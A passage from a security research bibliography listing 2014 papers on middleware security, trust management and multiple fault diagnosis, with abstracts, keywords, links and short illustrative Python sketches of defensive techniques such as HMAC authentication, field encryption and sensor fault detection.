    Keywords: Communication/Networking and Information Technology; Computer Systems Organization; Distributed Systems; General; Internet of things; social networks; trustworthiness management (ID#:14-2190)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6547148&isnumber=6814899
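    The subjective model described above, a node's own experience blended with the opinions of common friends weighted by their credibility, fits in a few lines. A sketch under assumed conventions (trust values in [0, 1]; the blending constant alpha is illustrative):

        def subjective_trust(direct: float, opinions, alpha: float = 0.5) -> float:
            """Trust of node i in node j; all values lie in [0, 1].

            direct   -- i's own transaction experience with j
            opinions -- [(credibility_of_friend, friend_opinion_of_j), ...]
                        taken over the friends i and j have in common
            """
            if not opinions:
                return direct
            total = sum(cred for cred, _ in opinions)
            indirect = sum(cred * op for cred, op in opinions) / total
            return alpha * direct + (1 - alpha) * indirect

        # Two credible common friends report poor service; direct experience was mixed.
        t = subjective_trust(direct=0.6, opinions=[(0.9, 0.2), (0.8, 0.1)])
        print(round(t, 3))   # 0.376: node j falls below a 0.5 service threshold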
  • Vegh, Laura; Miclea, Liviu, "Enhancing security in cyber-physical systems through cryptographic and steganographic techniques," Automation, Quality and Testing, Robotics, 2014 IEEE International Conference on, vol., no., pp.1,6, 22-24 May 2014. Information technology is continually changing; discoveries are made every other day. Cyber-physical systems consist of both physical and computational elements and are becoming more and more popular in today's society. They are complex systems, used in complex applications. Therefore, security is a critical and challenging aspect when developing cyber-physical systems. In this paper, we present a solution for ensuring data confidentiality and security by combining two of the most common methods in the area of security -- cryptography and steganography. Furthermore, we use hierarchical access to information to ensure confidentiality and also increase the overall security of the cyber-physical system.
    Keywords: cryptography; cyber-physical systems; hierarchical access; multi-agent systems; steganography (ID#:14-2191)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6857845&isnumber=6857810
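    The encrypt-then-hide combination the paper describes can be sketched with a toy stream cipher and least-significant-bit embedding. The SHA-256 keystream below is a stand-in for a real cipher such as AES, and the "image" is a bare byte array; both are simplifying assumptions for illustration only.

        import hashlib
        import secrets

        def keystream(key: bytes, n: int) -> bytes:
            out, counter = b"", 0
            while len(out) < n:
                out += hashlib.sha256(key + counter.to_bytes(8, "big")).digest()
                counter += 1
            return out[:n]

        def xor_cipher(key: bytes, data: bytes) -> bytes:  # encrypt == decrypt
            return bytes(a ^ b for a, b in zip(data, keystream(key, len(data))))

        def embed_lsb(pixels: bytearray, data: bytes) -> None:
            # Write each payload bit into the least significant bit of one "pixel".
            for i, byte in enumerate(data):
                for bit in range(8):
                    j = i * 8 + bit
                    pixels[j] = (pixels[j] & 0xFE) | ((byte >> bit) & 1)

        def extract_lsb(pixels: bytearray, nbytes: int) -> bytes:
            return bytes(
                sum((pixels[i * 8 + bit] & 1) << bit for bit in range(8))
                for i in range(nbytes)
            )

        key = secrets.token_bytes(32)
        cover = bytearray(secrets.token_bytes(1024))   # stand-in for pixel data
        secret = b"patient record #42"
        embed_lsb(cover, xor_cipher(key, secret))
        assert xor_cipher(key, extract_lsb(cover, len(secret))) == secret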

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Middleware Security

Middleware Security



Middleware facilitates distributed processing, and is of significant interest to the security world with the development of cloud and mobile applications. The articles listed here, presented and published in the first half of 2014, cover middleware used for healthcare, cyber-physical systems, and trust management.

  • Bruce, N.; Sain, M.; Hoon Jae Lee, "A Support Middleware Solution For E-Healthcare System Security," Advanced Communication Technology (ICACT), 2014 16th International Conference on, vol., no., pp.44,47, 16-19 Feb. 2014. doi: 10.1109/ICACT.2014.6778919 This paper presents a middleware solution to secure data and the network in an e-healthcare system. e-Healthcare systems are a primary security concern because their sensor devices are deployed in easily accessible areas and often interact closely with the physical environment and the surrounding people; such exposure increases security vulnerabilities when the security of information sharing among different healthcare organizations is improperly managed. Hence, healthcare-specific security standards such as authentication, data integrity, system security and Internet security are used to ensure the security and privacy of patients' information. This paper discusses security threats to e-healthcare systems in which an attacker can access both data and network using a masquerade attack. Moreover, an efficient and cost-effective middleware solution is discussed for the delivery of secure services.
    Keywords: data privacy; health care; medical administrative data processing; middleware; security of data; Internet security; authentication; data integrity; e-health care system security; electronic health care; health care organizations; health care-specific security standards; information sharing; masquerade attack; patient information privacy; patient information security; security vulnerabilities; support middleware solution; system security; Authentication; Communication system security; Logic gates; Medical services; Middleware; Wireless sensor networks; Data Security; Middleware; Network Security; e-Healthcare (ID#:14-2192)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6778919&isnumber=6778899
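A masquerade attack of the kind discussed above is conventionally blocked by authenticating every message. The sketch below shows the standard HMAC pattern using only Python's standard library; the shared-key provisioning and the message format are assumptions, not details from the paper.

```python
import hashlib
import hmac
import os

SECRET = os.urandom(32)  # provisioned out of band to sensor and middleware

def send(payload: bytes) -> tuple[bytes, bytes]:
    """Sensor side: attach a MAC so the middleware can detect masquerade."""
    tag = hmac.new(SECRET, payload, hashlib.sha256).digest()
    return payload, tag

def receive(payload: bytes, tag: bytes) -> bytes:
    """Middleware side: constant-time verification before forwarding."""
    expected = hmac.new(SECRET, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        raise ValueError("rejected: possible masquerade attack")
    return payload

msg, tag = send(b'{"patient": 17, "pulse": 72}')
assert receive(msg, tag) == b'{"patient": 17, "pulse": 72}'
```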
  • Kanewala, T.A; Marru, S.; Basney, J.; Pierce, M., "A Credential Store for Multi-tenant Science Gateways," Cluster, Cloud and Grid Computing (CCGrid), 2014 14th IEEE/ACM International Symposium on , vol., no., pp.445,454, 26-29 May 2014. doi: 10.1109/CCGrid.2014.95 Science Gateways bridge multiple computational grids and clouds, acting as overlay cyber infrastructure. Gateways have three logical tiers: a user interfacing tier, a resource tier and a bridging middleware tier. Different groups may operate these tiers. This introduces three security challenges. First, the gateway middleware must manage multiple types of credentials associated with different resource providers. Second, the separation of the user interface and middleware layers means that security credentials must be securely delegated from the user interface to the middleware. Third, the same middleware may serve multiple gateways, so the middleware must correctly isolate user credentials associated with different gateways. We examine each of these three scenarios, concentrating on the requirements and implementation of the middleware layer. We propose and investigate the use of a Credential Store to solve the three security challenges.
    Keywords: cloud computing; grid computing; middleware; user interfaces; clouds; computational grids; credential store; gateway middleware; middleware tier; multitenant science gateways; overlay cyber infrastructure; resource tier;user interfacing tier; Authentication; Communities; Logic gates; Middleware; Portals; Servers; Apache Airavata; Credential Store; OA4MP; Science Gateways; Security (ID#:14-2193)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6846480&isnumber=6846423
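The three challenges above can be made concrete with a toy credential store in which credentials are keyed by (gateway, user) and the user-interface tier only ever holds a short-lived delegation token. This is an editor's sketch of the general pattern, not the Apache Airavata implementation; all names are hypothetical.

```python
import secrets

class CredentialStore:
    """Toy multi-tenant credential store: (gateway, user) keying prevents
    one gateway from reading another's secrets, and the UI tier delegates
    via a one-time token instead of handling the credential itself."""

    def __init__(self):
        self._vault = {}    # (gateway_id, user_id) -> credential
        self._tokens = {}   # one-time token -> (gateway_id, user_id)

    def store(self, gateway_id, user_id, credential):
        self._vault[(gateway_id, user_id)] = credential

    def delegate(self, gateway_id, user_id):
        """Issue a token the UI tier can pass to the middleware tier."""
        token = secrets.token_urlsafe(16)
        self._tokens[token] = (gateway_id, user_id)
        return token

    def redeem(self, token, gateway_id):
        """Middleware redeems the token; tenant isolation is enforced here."""
        owner = self._tokens.pop(token, None)   # one-time use
        if owner is None or owner[0] != gateway_id:
            raise PermissionError("token invalid or wrong gateway")
        return self._vault[owner]

store = CredentialStore()
store.store("gatewayA", "alice", "x509:...")
t = store.delegate("gatewayA", "alice")
assert store.redeem(t, "gatewayA") == "x509:..."
```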
  • Al-Anzi, F.S.; Salman, A.A.; Jacob, N.K.; Soni, J., "Towards Robust, Scalable And Secure Network Storage In Cloud Computing," Digital Information and Communication Technology and it's Applications (DICTAP), 2014 Fourth International Conference on , pp.51,55, 6-8 May 2014. doi: 10.1109/DICTAP.2014.6821656 The term Cloud Computing did not appear overnight; it dates back to the time when computer systems remotely accessed applications and services. Cloud computing is a ubiquitous technology receiving huge attention in the scientific and industrial communities. It is a ubiquitous, next-generation information technology architecture that offers on-demand network access: a dynamic, virtualized, scalable, pay-per-use model over the Internet. In a cloud computing environment, a cloud service provider offers a "house of resources" that includes applications, data, runtime, middleware, operating system, virtualization, servers, data storage, sharing and networking, and takes up most of the client's overhead. Cloud computing offers many benefits, but the journey to the cloud is not easy; it has several pitfalls along the road, because most services are outsourced to third parties, which adds a considerable level of risk. Cloud computing suffers from several issues, among the most significant of which are security, privacy, service availability, confidentiality, integrity, authentication and compliance. Security is a shared responsibility of both client and service provider, and we believe security must be information-centric, adaptive, proactive and built in. Cloud computing and its security are emerging study areas nowadays. In this paper, we discuss data security in the cloud at the service provider end and propose a network storage architecture that ensures availability, reliability, scalability and security.
    Keywords: cloud computing; data integrity; data privacy; security of data; storage management; ubiquitous computing; virtualization; Internet; adaptive security; authentication; built in security; client overhead; cloud computing environment; cloud service provider; compliance; confidentiality; data security; data sharing; data storage; information centric security; integrity; middleware; network storage architecture; networking; on-demand access; operating system; pay per use model; privacy; proactive security; remote application access ;remote service access; robust scalable secure network storage; server; service availability; service outsourcing; ubiquitous next generation information technology architecture; virtualization; Availability; Cloud computing; Computer architecture; Data security; Distributed databases; Servers; Cloud Computing; Data Storage; Data security; RAID (ID#:14-2194)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6821656&isnumber=6821645
  • Xingbang Tian; Baohua Huang; Min Wu, "A Transparent Middleware For Encrypting Data in MongoDB," Electronics, Computer and Applications, 2014 IEEE Workshop on , vol., no., pp.906,909, 8-9 May 2014. doi: 10.1109/IWECA.2014.6845768 Due to the development of cloud computing and NoSQL databases, more and more sensitive information is stored in NoSQL databases, which exposes quite a lot of security vulnerabilities. This paper discusses the security features of the MongoDB database and proposes a transparent middleware implementation. Analysis of the experimental results shows that this transparent middleware can efficiently encrypt sensitive data specified by users at the dataset level, and existing application systems need only minor modifications to apply it.
    Keywords: cryptography; middleware; relational databases; MongoDB database; NoSQL database; cloud computing; dataset level; security vulnerability; sensitive data encryption; transparent middleware; Blogs; Cryptography; Educational institutions; Middleware; Database; Encrypting; MongoDB; NoSQL (ID#:14-2195)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6845768&isnumber=6845536
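A transparent encrypting wrapper of the kind the paper describes can be sketched in a few lines. The example below assumes the pymongo and cryptography packages and a running local mongod, and invents the EncryptingCollection name and field-level granularity; the authors' middleware works at the dataset level and differs in detail.

```python
from cryptography.fernet import Fernet   # assumes the 'cryptography' package
from pymongo import MongoClient          # assumes pymongo and a local mongod

class EncryptingCollection:
    """Wrap a MongoDB collection so that fields listed in `sensitive` are
    encrypted on insert and decrypted on find, transparently to callers."""

    def __init__(self, collection, key, sensitive):
        self._c = collection
        self._f = Fernet(key)
        self._sensitive = set(sensitive)

    def insert_one(self, doc):
        enc = {k: self._f.encrypt(str(v).encode()) if k in self._sensitive else v
               for k, v in doc.items()}
        return self._c.insert_one(enc)

    def find_one(self, query):
        doc = self._c.find_one(query)
        if doc:
            for k in self._sensitive & doc.keys():
                doc[k] = self._f.decrypt(doc[k]).decode()
        return doc

key = Fernet.generate_key()
users = EncryptingCollection(MongoClient()["app"]["users"], key,
                             sensitive=["ssn", "diagnosis"])
users.insert_one({"name": "alice", "ssn": "123-45-6789"})
print(users.find_one({"name": "alice"}))   # ssn comes back in the clear
```

One trade-off this makes visible: because the encryption is randomized, equality queries on encrypted fields no longer match, so fields that must be queried either stay in the clear or need a different scheme.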
  • Ochian, Adelina; Suciu, George; Fratu, Octavian; Voicu, Carmen; Suciu, Victor, "An Overview Of Cloud Middleware Services For Interconnection Of Healthcare Platforms," Communications (COMM), 2014 10th International Conference on , vol., no., pp.1,4, 29-31 May 2014. doi: 10.1109/ICComm.2014.6866753 Using heterogeneous clouds has been considered to improve performance of big-data analytics for healthcare platforms. However, the problem of the delay when transferring big-data over the network needs to be addressed. The purpose of this paper is to analyze and compare existing cloud computing environments (PaaS, IaaS) in order to implement middleware services. Understanding the differences and similarities between cloud technologies will help in the interconnection of healthcare platforms. The paper provides a general overview of the techniques and interfaces for cloud computing middleware services, and proposes a cloud architecture for healthcare. Cloud middleware enables heterogeneous devices to act as data sources and to integrate data from other healthcare platforms, but specific APIs need to be developed. Furthermore, security and management problems need to be addressed, given the heterogeneous nature of the communication and computing environment. The present paper fills a gap in the electronic healthcare register literature by providing an overview of cloud computing middleware services and standardized interfaces for the integration with medical devices.
    Keywords: big data; cloud; healthcare; middleware; security; standards (ID#:14-2196)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6866753&isnumber=6866648
  • Hoos, E., "Design method for developing a Mobile Engineering-Application Middleware (MEAM)," Pervasive Computing and Communications Workshops (PERCOM Workshops), 2014 IEEE International Conference on, vol., no., pp.176,177, 24-28 March 2014. doi: 10.1109/PerComW.2014.6815193 Mobile apps running on smartphones and tablet PCs offer a new possibility to enhance the work of engineers because they provide easy-to-use, touchscreen-based handling and can be used anytime and anywhere. Introducing mobile apps in the engineering domain is difficult because the IT environment is heterogeneous and engineering-specific challenges arise in app development, e.g., large amounts of data and high security requirements. There is a need for an engineering-specific middleware to facilitate and standardize app development, but neither such a middleware nor a holistic set of requirements for its development yet exists. Therefore, we propose a design method which offers a systematic procedure for developing a Mobile Engineering-Application Middleware.
    Keywords: middleware; mobile computing; IT environment; MEAM; mobile engineering-application middleware; touchscreen-based handling; Business; Design methodology; Measurement; Middleware; Mobile communication; Security; Systematics; Design Method; Mobile Application; Mobile Engineering Application Middleware (ID#:14-2197)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6815193&isnumber=6815123
  • Gang Han; Haibo Zeng; Yaping Li; Wenhua Dou, "SAFE: Security-Aware FlexRay Scheduling Engine," Design, Automation and Test in Europe Conference and Exhibition (DATE), 2014 , vol., no., pp.1,4, 24-28 March 2014. doi: 10.7873/DATE2014.021 In this paper, we propose SAFE (Security Aware FlexRay scheduling Engine), to provide a problem definition and a design framework for FlexRay static segment schedule to address the new challenge on security. From a high level specification of the application, the architecture and communication middleware are synthesized to satisfy security requirements, in addition to extensibility, costs, and end-to-end latencies. The proposed design process is applied to two industrial case studies consisting of a set of active safety functions and an X-by-wire system respectively.
    Keywords: automotive electronics; mobile radio; protocols; scheduling; telecommunication security ;FlexRay static segment schedule; SAFE;X-by-wire system; active safety functions; automotive domain; automotive electrical-electronic systems; communication middleware; communication protocol; end-to-end latencies; security-aware FlexRay scheduling engine; Authentication; Automotive engineering; Field programmable gate arrays; Protocols; Runtime; Safety (ID#:14-2198)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6800222&isnumber=6800201
  • Oliveira Vasconcelos, R.; Nery e Silva, L.D.; Endler, M., "Towards efficient group management and communication for large-scale mobile applications," Pervasive Computing and Communications Workshops (PERCOM Workshops), 2014 IEEE International Conference on , vol., no., pp.551,556, 24-28 March 2014. doi: 10.1109/PerComW.2014.6815266 Applications such as fleet management and logistics, emergency response, public security and surveillance or mobile workforce management use geo-positioning and mobile networks as means of enabling real-time monitoring, communication and collaboration among a possibly large set of mobile nodes. The majority of those systems require real-time tracking of mobile nodes (e.g. vehicles, people or mobile robots), reliable communication to/from the nodes, as well as group communication among the mobile nodes. In this paper we describe a distributed middleware with focus on management of context-defined groups of mobile nodes, and group communication with large sets of nodes. We also present a prototype Fleet Tracking and Management system based on our middleware, give an example of how context-specific group communication can enhance the node's mutual awareness, and show initial performance results that indicate small overhead and latency of the group communication and management.
    Keywords: middleware; mobile computing; collaboration; context-defined group management; context-specific group communication; distributed middleware; emergency response; fleet tracking and management system; geopositioning; large-scale mobile applications; logistics; mobile networks; mobile nodes; mobile workforce management; node mutual awareness; public security; real-time monitoring; real-time tracking; reliable communication; surveillance; Logic gates; Manganese; Mobile nodes; Subscriptions; Vehicles; DDS; context-defined groups; group communication; group management; middleware; mobile systems (ID#:14-2199)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6815266&isnumber=6815123
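Context-defined group management of this sort reduces to re-evaluating a membership predicate whenever a node reports new context, then publishing to the group's current members. A minimal stand-in for the paper's DDS-based middleware, with all names and predicates invented for illustration:

```python
class GroupBroker:
    """Toy context-defined group communication: nodes are (re)assigned to
    groups by a context predicate, and a message to a group reaches
    exactly its current members."""

    def __init__(self, predicates):
        self.predicates = predicates                  # group -> predicate
        self.members = {g: set() for g in predicates}

    def update_context(self, node, context):
        """Called whenever a node reports new context (e.g., position)."""
        for group, pred in self.predicates.items():
            if pred(context):
                self.members[group].add(node)
            else:
                self.members[group].discard(node)

    def publish(self, group, message):
        """Deliver to the group's current members (delivery map returned)."""
        return {node: message for node in self.members[group]}

broker = GroupBroker({"downtown": lambda c: c["zone"] == "downtown"})
broker.update_context("vehicle-7", {"zone": "downtown"})
broker.update_context("vehicle-9", {"zone": "airport"})
print(broker.publish("downtown", "reroute"))   # only vehicle-7 receives it
```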
  • Gazzarata, R.; Vergari, F.; Salmon Cinotti, T.; Giacomini, M., "A Standardized SOA For Clinical Data Interchange In A Cardiac Telemonitoring Environment," Biomedical and Health Informatics, IEEE Journal of, vol. PP, no.99, pp.1,1, July 2014. doi: 10.1109/JBHI.2014.2334372 Care of chronic cardiac patients requires information interchange between patients' homes, clinical environments and the Electronic Health Record (EHR). Standards are emerging to support clinical information collection, exchange and management and to overcome information fragmentation and actors delocalization. Heterogeneity of information sources at patients' homes calls for open solutions to collect and accommodate multi-domain information, including environmental data. Based on the experience gained in a European Research Program, this paper presents an integrated and open approach for clinical data interchange in cardiac telemonitoring applications. This interchange is supported by the use of standards following the indications provided by the national authorities of the countries involved. Taking into account the requirements provided by the medical staff involved in the project, the authors designed and implemented a prototypal middleware, based on a Service Oriented Architecture (SOA) approach, to give a structured and robust tool to CHF (Congestive Heart Failure) patients for their personalized telemonitoring. The middleware is represented by a Health Record Management Service (HRMS), whose interface is compliant with the HSSP (Healthcare Services Specification Project) RLUS (Retrieve, Locate and Update Service) standard (Level 0), which allows communication between the agents involved through the exchange of CDA R2 (Clinical Document Architecture Release 2) documents. Three performance tests were carried out and showed that the prototype completely fulfilled all requirements indicated by the medical staff; however, certain aspects, such as authentication, security and scalability, should be analyzed in depth during a future engineering phase.
    Keywords: Educational institutions; Informatics; Medical services; Semantics; Service-oriented architecture; Standards (ID#:14-2200)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6847101&isnumber=6363502
  • Potdar, M.S.; Manekar, AS.; Kadu, R.D., "Android "Health-Dr." Application for Synchronous Information Sharing," Communication Systems and Network Technologies (CSNT), 2014 Fourth International Conference on , vol., no., pp.265,269, 7-9 April 2014. doi: 10.1109/CSNT.2014.58 Android "Health-DR." is an innovative idea for ambulatory appliances. Amid rapidly developing technology, the "Health-DR." application serves insurance agents, dispensaries, patients and physicians, and provides records management (security) for medical records, the bulk of which are maintained by hospitals. The application only needs to be installed at the customer site within an IT environment. The main purpose of the application is to provide a healthy environment for the patient, with the core focus on fitting the "Health-DR." application to the patient's regimen. For members' personal use, an authentication service strategy is provided for the "Health-DR." application. The prospective strategy includes professional authentication (user authentication) of the patient, actuary and dispensary by the doctor. Remote access to the medical records is available, with flexibility for both doctor and patient. "Health-DR." provides expertise anytime and anywhere. The application is middleware that isolates information across flexibility management, client discovery and database transit; annotations of records are kept in the bibliography. Mainly, this paper focuses on the conversion of an e-health application to flexible surroundings.
    Keywords: Android (operating system);electronic health records; middleware; mobile computing; Android Health-Dr ;IT environment; affability management; ambulatory appliances ;annals management; bibliography; client discovery; database transit; dispensary; doctor affability; e-health application; healthy environment; insurance agent; medical annals; middleware; patient affability; physician; professional authentications; synchronous information sharing; user authentication; Androids; Authentication; Databases; Educational institutions; Insurance; Medical services; Mobile communication; Alert mechanism; Annotations of records; Doctor Flexibility; Health-DR. Engineering ;Insurance acumen or actuary Medical annals; Patient flexibility; Professional authentications (ID#:14-2201)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6821398&isnumber=6821334
  • Dong-Hoon Shin; Shibo He; Junshan Zhang, "Robust, Secure, and Cost-Effective Design for Cyber-Physical Systems," Intelligent Systems, IEEE , vol.29, no.1, pp.66,69, Jan.-Feb. 2014. doi: 10.1109/MIS.2014.9 Cyber-physical systems (CPS) can potentially benefit a wide array of applications and areas. Here, the authors look at some of the challenges surrounding CPS, and consider a feasible solution for creating a robust, secure, and cost-effective architecture.
    Keywords: middleware; power system security; smart power grids; stability; CPS; cost-effective architecture; cost-effective design; cyberphysical systems; middleware; robustness; security vulnerability; smart grid; Cyber-physical systems; Logic gates; Middleware; Monitoring; Phasor measurement units; Quality of service; Robustness; CPS; CPSS; cyber-physical systems; cyber-physical-social systems; intelligent systems; middleware (ID#:14-2202)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6802237&isnumber=6802214
  • Li, X.; Ma, H.; Zhou, F.; Gui, X., "Service Operator-aware Trust Scheme for Resource Matchmaking across Multiple Clouds," Parallel and Distributed Systems, IEEE Transactions on , vol.PP, no.99, pp.1,1, May 2014. doi: 10.1109/TPDS.2014.2321750 This paper proposes a service operator-aware trust scheme (SOTS) for resource matchmaking across multiple clouds. Through analyzing the built-in relationship between the users, the broker, and the service resources, this paper proposes a middleware framework of trust management that can effectively reduce user burden and improve system dependability. Based on multi-dimensional resource service operators, we model the problem of trust evaluation as a process of multi-attribute decision-making, and develop an adaptive trust evaluation approach based on information entropy theory. This adaptive approach can overcome the limitations of traditional trust schemes, whereby the trusted operators are weighted manually or subjectively. As a result, using SOTS, the broker can efficiently and accurately prepare the most trusted resources in advance, and thus provide more dependable resources to users. Our experiments yield interesting and meaningful observations that can facilitate the effective utilization of SOTS in a large-scale multi-cloud environment.
    Keywords: Availability; Computational modeling; Entropy; Information entropy; Registers; Security (ID#:14-2203)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6810192&isnumber=4359390
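The entropy-based weighting at the heart of SOTS can be shown on a small example: attributes whose values differ more across candidate resources carry more information and therefore receive larger weights, avoiding the manual weighting the paper criticizes. The matrix values below are invented for illustration.

```python
import math

def entropy_weights(matrix):
    """matrix[i][j]: value of service attribute j observed for candidate
    resource i (e.g., availability, past success rate), all positive."""
    m, n = len(matrix), len(matrix[0])
    divergence = []
    for j in range(n):
        col = [row[j] for row in matrix]
        total = sum(col)
        p = [v / total for v in col]
        # Normalized Shannon entropy; low entropy means high information.
        entropy = -sum(pi * math.log(pi) for pi in p if pi > 0) / math.log(m)
        divergence.append(1 - entropy)
    s = sum(divergence)
    return [d / s for d in divergence]

candidates = [[0.90, 0.70, 0.95],   # resource A
              [0.80, 0.90, 0.40],   # resource B
              [0.90, 0.80, 0.90]]   # resource C
w = entropy_weights(candidates)
trust = [sum(wj * row[j] for j, wj in enumerate(w)) for row in candidates]
print(w, trust)   # the broker ranks resources by aggregated trust
```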
  • Ravindran, K.; Mukhopadhyay, S.; Sidhanta, S.; Sabbir, A, "Managing shared contexts in distributed multi-player game systems," Communication Systems and Networks (COMSNETS), 2014 Sixth International Conference on , vol., no., pp.1,8, 6-10 Jan. 2014. doi: 10.1109/COMSNETS.2014.6734908 In this paper, we consider the impact of a weaker model of eventual consistency on distributed multi-player games. This model is suitable for networks in which hosts can leave and join at anytime, e.g., in an intermittently connected environment. Such a consistency model is provided by the Secure Infrastructure for Networked Systems (SINS) [24], a reliable middleware framework. SINS allows agents to communicate asynchronously through a distributed transactional key-value store using anonymous publish-subscribe. It uses Lamport's Paxos protocol [17] to replicate state. We consider a multi-player maze game as an example to illustrate our consistency model and the impact of network losses/delays therein. The framework based on SINS presented herein provides a vehicle for studying the effect of human elements participating in collaborative simulation of a physical world as in war games.
    Keywords: computer games; message passing; middleware; protocols; security of data; Lamport Paxos protocol; SINS; anonymous publish-subscribe; distributed multiplayer game systems; distributed transactional key-value store; multiplayer maze game; network losses-delay; reliable middleware framework; secure infrastructure for networked systems; shared context mapping; war games; Delays; Irrigation; Protocols; Real-time systems; Receivers; Semantics; Silicon compounds (ID#:14-2204)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6734908&isnumber=6734849
  • Apolinarski, W.; Iqbal, U.; Parreira, J.X., "The GAMBAS Middleware And SDK For Smart City Applications," Pervasive Computing and Communications Workshops (PERCOM Workshops), 2014 IEEE International Conference on , vol., no., pp.117,122, 24-28 March 2014. doi: 10.1109/PerComW.2014.6815176 The concept of smart cities envisions services that provide distraction-free support for citizens. To realize this vision, the services must adapt to the citizens' situations, behaviors and intents at runtime. This requires services to gather and process the context of their users. Mobile devices provide a promising basis for determining context in an automated manner on a large scale. However, despite the wide availability of versatile programmable mobile platforms such as Android and iOS, there are only a few examples of smart city applications. One reason for this is that existing software platforms primarily focus on low-level resource management, which requires application developers to repeatedly tackle many challenging tasks. Examples include efficient data acquisition, secure and privacy-preserving data distribution as well as interoperable data integration. In this paper, we describe the GAMBAS middleware which tries to simplify the development of smart city applications. To do this, GAMBAS introduces a Java-based runtime system with an associated software development kit (SDK). To clarify how the runtime system and the SDK can be used for application development, we describe two simple applications that highlight different middleware functions.
    Keywords: Java; middleware; software engineering; GAMBAS middleware; Java-based runtime system; SDK; distraction-free support; smart city applications; software development kit; Androids; Cities and towns; Data acquisition; Humanoid robots; Middleware; Runtime; Security (ID#:14-2205)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6815176&isnumber=6815123

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Multiple Fault Diagnosis

Multiple Fault Diagnosis


According to Shakeri, "the computational complexity of solving the optimal multiple-fault isolation problem is super exponential." Most processes and procedures assume that there will be only one fault at any given time. Many algorithms are designed to do sequential diagnostics. With the growth of cloud computing and multicore processors and the ubiquity of sensors, the problem of multiple fault diagnosis has grown even larger. The research cited here, from the first half of 2014, looks at different detection methods in a variety of media.

  • M. El-Koujok, M. Benammar, N. Meskin, M. Al-Naemi, R. Langari, "Multiple Sensor Fault Diagnosis By Evolving Data-Driven Approach," Information Sciences: an International Journal, Volume 259, February, 2014, Pages 346-358. doi: 10.1016/j.ins.2013.04.012 Sensors are indispensable components of modern plants and processes and their reliability is vital to ensure reliable and safe operation of complex systems. In this paper, the problem of design and development of a data-driven Multiple Sensor Fault Detection and Isolation (MSFDI) algorithm for nonlinear processes is investigated. The proposed scheme is based on an evolving multi-Takagi Sugeno framework in which each sensor output is estimated using a model derived from the available input/output measurement data. Our proposed MSFDI algorithm is applied to Continuous-Flow Stirred-Tank Reactor (CFSTR). Simulation results demonstrate and validate the performance capabilities of our proposed MSFDI algorithm.
    Keywords: Data-driven approach, Nonlinear system, Sensor fault diagnosis (ID#:14-2206)
    URL: http://dl.acm.org/citation.cfm?id=2564929.2565018&coll=DL&dl=GUIDE&CFID=397708923&CFTOKEN=12634367 or http://dx.doi.org/10.1016/j.ins.2013.04.012
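The general shape of such a scheme, estimating each sensor from the others and flagging large residuals, can be sketched as follows. Simple linear estimators stand in for the paper's evolving multi-Takagi-Sugeno models, and all names and numbers are illustrative.

```python
def detect_sensor_faults(readings, models, threshold=3.0):
    """Flag sensors whose measured value disagrees with the value
    estimated from the other sensors.

    readings -- dict sensor -> measured value
    models   -- dict sensor -> (coefficients over other sensors,
                                offset, residual std dev sigma)
    """
    faulty = []
    for sensor, (coeffs, offset, sigma) in models.items():
        estimate = offset + sum(c * readings[o] for o, c in coeffs.items())
        if abs(readings[sensor] - estimate) > threshold * sigma:
            faulty.append(sensor)
    return faulty

# Two temperature sensors that track each other in normal operation:
models = {"T1": ({"T2": 0.98}, 0.5, 0.2),
          "T2": ({"T1": 1.00}, -0.5, 0.2)}
# T1 drifts low: both residuals fire; isolation logic (not shown) would
# attribute the fault to the sensor implicated by all firing residuals.
print(detect_sensor_faults({"T1": 25.0, "T2": 31.0}, models))
```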
  • Yu-Lin He, Ran Wang, Sam Kwong, Xi-Zhao Wang, "Bayesian Classifiers Based On Probability Density Estimation And Their Applications To Simultaneous Fault Diagnosis," Information Sciences: an International Journal, Volume 259, February, 2014, Pages 252-268. doi: 10.1016/j.ins.2013.09.003 A key characteristic of simultaneous fault diagnosis is that the features extracted from the original patterns are strongly dependent. This paper proposes a new model of Bayesian classifier, which removes the fundamental assumption of naive Bayesian, i.e., the independence among features. In our model, the optimal bandwidth selection is applied to estimate the class-conditional probability density function (p.d.f.), which is the essential part of joint p.d.f. estimation. Three well-known indices, i.e., classification accuracy, area under ROC curve, and probability mean square error, are used to measure the performance of our model in simultaneous fault diagnosis. Simulations show that our model is significantly superior to the traditional ones when the dependence exists among features.
    Keywords: Bayesian classification, Dependent feature, Joint probability density estimation, Optimal bandwidth, Simultaneous fault diagnosis, Single fault (ID#:14-2207)
    URL: http://dl.acm.org/citation.cfm?id=2564929.2564984&coll=DL&dl=GUIDE&CFID=397708923&CFTOKEN=12634367 or http://dx.doi.org/10.1016/j.ins.2013.09.003
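The key move, estimating the class-conditional joint density instead of assuming feature independence, can be reproduced with off-the-shelf kernel density estimation. The sketch below assumes scikit-learn and a fixed bandwidth, whereas the paper selects the bandwidth optimally; the class name and data are invented.

```python
import numpy as np
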